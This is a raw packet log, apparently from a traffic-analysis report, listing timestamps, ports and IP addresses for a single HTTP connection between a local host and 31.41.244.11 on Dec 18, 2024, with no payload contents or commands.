Dec 18, 2024 13:38:12.081974030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.082029104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.082231998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.082278013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.083154917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.083214998 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.083337069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.083383083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.084327936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.084378958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.084533930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.084582090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.085438967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.085486889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.085526943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.085571051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.086540937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.086589098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.086783886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.086836100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.087687016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.087733984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.087763071 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.087806940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.088887930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.088936090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.089036942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.089081049 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.090001106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.090044975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.090260029 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.090308905 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.091137886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.091185093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.091233015 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.091276884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.092200994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.092247009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.092345953 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.092395067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.093528032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.093575954 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.093642950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.093687057 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.094804049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.094855070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.094891071 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.094935894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.095733881 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.095782995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.095849037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.095895052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.096816063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.096863985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.096971989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.097018003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.097879887 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.097932100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.098067999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.098109961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.099117041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.099163055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.229062080 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.229080915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.229305029 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.229460001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.229523897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.229568958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.229618073 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.230540037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.230587006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.230613947 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.230639935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.231544971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.231560946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.231616974 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.232467890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.232531071 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.232706070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.232758999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.233480930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.233536005 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.233544111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.233589888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.234499931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.234580040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.234599113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.234639883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.235553980 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.235616922 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.235696077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.235748053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.236550093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.236624002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.236726999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.236776114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.237498045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.237557888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.237584114 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.237639904 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.238480091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.238547087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.238625050 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.238677025 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.239506006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.239562035 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.239599943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.239644051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.240535021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.240606070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.240645885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.240689993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.241528034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.241591930 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.241641045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.241693974 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.242475986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.242537022 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.242607117 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.242656946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.243462086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.243565083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.243577957 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.243617058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.244493961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.244561911 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.244740963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.244795084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.245496035 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.245559931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.245744944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.245810032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.246634007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.246695042 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.246896982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.246947050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.247663975 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.247728109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.247809887 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.247860909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.248770952 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.248828888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.248996973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.249049902 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.249713898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.249766111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.249787092 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.249811888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.250483036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.250533104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.250720024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.250778913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.251491070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.251553059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.251595020 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.251643896 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.252523899 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.252583981 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.252691031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.252749920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.253520012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.253580093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.253740072 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.253803968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.254564047 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.254595041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.254636049 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.254700899 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.255506992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.255570889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.255615950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.255662918 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.256464958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.256529093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.256639957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.256695986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.257489920 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.257560015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.257606983 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.257674932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.258922100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.258979082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.258980989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.259023905 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.259958982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.260034084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.260121107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.260176897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.261002064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.261029959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.261065960 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.261084080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.261914968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.262018919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.262038946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.262082100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.262756109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.262819052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.262955904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.263010025 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.263858080 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.263916969 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.264014959 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.264064074 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.264880896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.264931917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.265055895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.265105963 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.265804052 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.265872002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.265965939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.266027927 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.266788960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.266859055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.267041922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.267102003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.267592907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.267663956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.267708063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.267759085 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.268470049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.268556118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.268625021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.268676996 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.269509077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.269572020 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.269603014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.269648075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.270679951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.270761967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.271028042 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.271087885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.271976948 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.272058964 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.272175074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.272229910 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.273072958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.273155928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.273173094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.273225069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.274465084 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.274543047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.274641037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.274694920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.275826931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.275908947 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.275954962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.276014090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.277014017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.277092934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.277101994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.277143955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.278364897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.278443098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.278503895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.278565884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.279515028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.279597998 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.279712915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.279773951 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.280658960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.280714989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.280740976 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.280786037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.281537056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.281615019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.281682968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.281744003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.282322884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.282397985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.282460928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.282516956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.283328056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.283399105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.421122074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.421175957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.421190977 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.421375036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.421639919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.421680927 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.421710014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.421758890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.422540903 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.422590017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.422652006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.422693014 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.423549891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.423602104 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.423625946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.423660994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.424644947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.424694061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.424833059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.424866915 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.425506115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.425551891 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.425627947 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.425672054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.426577091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.426628113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.426631927 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.426668882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.427550077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.427639008 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.427654982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.427695036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.428518057 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.428594112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.428641081 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.428678989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.429512024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.429565907 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.429696083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.429738998 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.430588961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.430629969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.430635929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.430665016 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.431570053 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.431615114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.431725979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.431763887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.432558060 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.432605028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.432621002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.432641983 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.433538914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.433597088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.433931112 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.433969021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.434554100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.434606075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.434648037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.434691906 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.435530901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.435571909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.435888052 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.435933113 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.436567068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.436613083 CET	49708	80	192.168.2.8	31.41.244.11
